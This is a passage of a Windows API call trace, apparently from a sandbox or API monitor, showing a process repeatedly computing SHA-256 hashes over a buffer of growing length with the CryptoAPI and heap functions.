	[0201.799] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0201.799] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.799] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9380
	[0201.800] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9380, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9380, pdwDataLen=0x129424) returned 1
	[0201.800] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.800] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.800] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.800] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.800] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0201.800] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.800] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c93a8
	[0201.800] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c93a8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c93a8, pdwDataLen=0x129424) returned 1
	[0201.800] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.800] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.800] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.800] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.800] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0201.800] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.800] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c93d0
	[0201.801] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c93d0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c93d0, pdwDataLen=0x129424) returned 1
	[0201.801] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.801] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.801] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2756bf0) returned 1
	[0201.801] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2756bf0
	[0201.801] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.801] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.801] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0201.801] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.801] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c93f8
	[0201.801] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c93f8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c93f8, pdwDataLen=0x129424) returned 1
	[0201.801] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.801] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.801] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.801] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.802] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0201.802] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.802] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9420
	[0201.802] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9420, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9420, pdwDataLen=0x129424) returned 1
	[0201.802] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.802] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.802] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.802] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.802] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0201.802] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.802] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9448
	[0201.802] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9448, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9448, pdwDataLen=0x129424) returned 1
	[0201.802] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.802] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.802] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.803] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.803] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0201.803] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.803] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9470
	[0201.803] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9470, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9470, pdwDataLen=0x129424) returned 1
	[0201.803] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.803] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.803] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.803] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.803] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0201.803] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.803] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9498
	[0201.803] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9498, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9498, pdwDataLen=0x129424) returned 1
	[0201.803] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.803] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.803] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.804] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.804] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0201.804] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.804] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c94c0
	[0201.804] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c94c0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c94c0, pdwDataLen=0x129424) returned 1
	[0201.804] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.804] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.804] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.804] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.804] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0201.804] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.804] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c94e8
	[0201.804] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c94e8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c94e8, pdwDataLen=0x129424) returned 1
	[0201.804] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.804] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.804] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.805] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.805] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0201.805] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.805] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9510
	[0201.805] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9510, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9510, pdwDataLen=0x129424) returned 1
	[0201.805] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.805] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.805] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.805] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.805] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0201.805] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.805] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9538
	[0201.805] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9538, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9538, pdwDataLen=0x129424) returned 1
	[0201.805] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.805] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.805] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.806] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.806] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0201.806] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.806] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9560
	[0201.806] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9560, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9560, pdwDataLen=0x129424) returned 1
	[0201.806] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.806] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.806] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.806] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.806] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0201.806] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.806] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9588
	[0201.806] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9588, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9588, pdwDataLen=0x129424) returned 1
	[0201.806] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.806] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.806] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.807] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.807] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0201.807] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.807] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c95b0
	[0201.807] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c95b0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c95b0, pdwDataLen=0x129424) returned 1
	[0201.807] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.807] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.807] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.807] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.807] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0201.807] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.807] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c95d8
	[0201.807] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c95d8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c95d8, pdwDataLen=0x129424) returned 1
	[0201.807] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.807] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.807] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.808] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.808] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0201.808] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.808] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9600
	[0201.808] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9600, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9600, pdwDataLen=0x129424) returned 1
	[0201.808] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.808] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.808] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.808] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.808] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0201.808] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.808] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9628
	[0201.808] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9628, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9628, pdwDataLen=0x129424) returned 1
	[0201.808] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.808] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.808] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.809] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.809] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0201.809] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.809] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9650
	[0201.809] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9650, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9650, pdwDataLen=0x129424) returned 1
	[0201.809] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.809] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.809] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.809] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.809] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0201.809] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.809] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9678
	[0201.809] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9678, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9678, pdwDataLen=0x129424) returned 1
	[0201.809] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.809] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.809] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.810] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.810] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0201.810] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.810] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c96a0
	[0201.810] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c96a0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c96a0, pdwDataLen=0x129424) returned 1
	[0201.810] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.810] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.810] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.810] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.810] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0201.810] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.810] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c96c8
	[0201.810] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c96c8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c96c8, pdwDataLen=0x129424) returned 1
	[0201.810] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.810] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.810] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.811] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.811] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0201.811] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.811] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c96f0
	[0201.811] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c96f0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c96f0, pdwDataLen=0x129424) returned 1
	[0201.811] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.811] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.811] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.811] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.811] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0201.811] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.811] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9718
	[0201.811] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9718, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9718, pdwDataLen=0x129424) returned 1
	[0201.811] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.812] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.812] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.812] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.812] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0201.812] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.812] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9740
	[0201.812] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26c9740, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9740, pdwDataLen=0x129424) returned 1
	[0201.812] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.812] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.812] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.812] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.812] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0201.812] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.812] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26c9768
	[0201.812] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26c9768, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26c9768, pdwDataLen=0x129424) returned 1
